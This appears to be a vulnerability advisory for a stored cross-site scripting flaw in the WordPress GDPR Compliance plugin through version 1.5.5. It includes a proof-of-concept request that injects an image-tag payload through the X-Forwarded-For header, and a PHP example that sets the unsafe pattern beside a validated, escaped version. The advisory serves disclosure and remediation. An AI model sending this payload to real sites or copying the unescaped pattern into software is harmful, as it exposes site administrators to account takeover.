The GDPR Compliance plugin for WordPress, in versions <= 1.5.5, allowed unauthenticated users to perform Stored Cross-Site Scripting (XSS) in the administration panel, which could lead to privilege escalation. This was because clients' IP addresses were reflected in the plugin's dashboard without being properly validated or escaped.
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: 0.0.0.0:31337
X-Forwarded-For: 1.1.1.1"><img src=x onerror=alert(1)>

action=wpgdprc_process_action&security=cccf5a60ec&data={"type":"access_request","email":"[email protected]","consent":true}
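As an added illustration (this is not the plugin's code; function names and the trusted-proxy list are hypothetical), the unsafe pattern the advisory describes next to a hardened version that only trusts X-Forwarded-For from a known proxy, validates the value as an IP address, and escapes it on output:

```php
<?php
// Added example, not code from the GDPR Compliance plugin. Function names
// and the trusted-proxy list are hypothetical.

// Vulnerable pattern the advisory describes: a client-controlled header is
// copied straight into dashboard markup, so any HTML in it is rendered.
function vulnerable_ip_cell(array $server): string
{
    return '<td>' . ($server['HTTP_X_FORWARDED_FOR'] ?? $server['REMOTE_ADDR']) . '</td>';
}

/**
 * Return the client IP to store or display, or null when no valid address exists.
 * X-Forwarded-For is attacker-controlled, so it is honoured only when the
 * request came from a trusted proxy, and the value must parse as an IP.
 */
function client_ip_for_display(array $server, array $trusted_proxies): ?string
{
    $remote    = $server['REMOTE_ADDR'] ?? '';
    $candidate = $remote;

    if (in_array($remote, $trusted_proxies, true) && !empty($server['HTTP_X_FORWARDED_FOR'])) {
        // XFF may be a comma-separated chain; the first entry is the original client.
        $parts     = array_map('trim', explode(',', $server['HTTP_X_FORWARDED_FOR']));
        $candidate = $parts[0];
    }

    // Validation: anything that is not a literal IPv4/IPv6 address is discarded,
    // so a header carrying markup is never stored in the first place.
    return filter_var($candidate, FILTER_VALIDATE_IP) !== false ? $candidate : null;
}

/** Output escaping as the second layer; inside WordPress, esc_html() does the same job. */
function safe_ip_cell(?string $ip): string
{
    $text = $ip ?? 'unknown';
    return '<td>' . htmlspecialchars($text, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</td>';
}

// Constructed request: the header carries markup instead of an address.
$constructed = [
    'REMOTE_ADDR'          => '10.0.0.5',
    'HTTP_X_FORWARDED_FOR' => '1.1.1.1"><img src=x onerror=alert(1)>',
];
echo vulnerable_ip_cell($constructed), PHP_EOL;                                  // markup reaches the page
echo safe_ip_cell(client_ip_for_display($constructed, ['10.0.0.5'])), PHP_EOL;   // rejected by validation, then escaped
```

Validation alone would already block this payload, but keeping the output escaping means a value that later enters the table by another path (an import, a migration) is still rendered inert.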
vavkamil
vavkamil
Yes
2021-03-01 (about 1 year ago)
2021-03-01 (about 1 year ago)
2021-03-04 (about 1 year ago)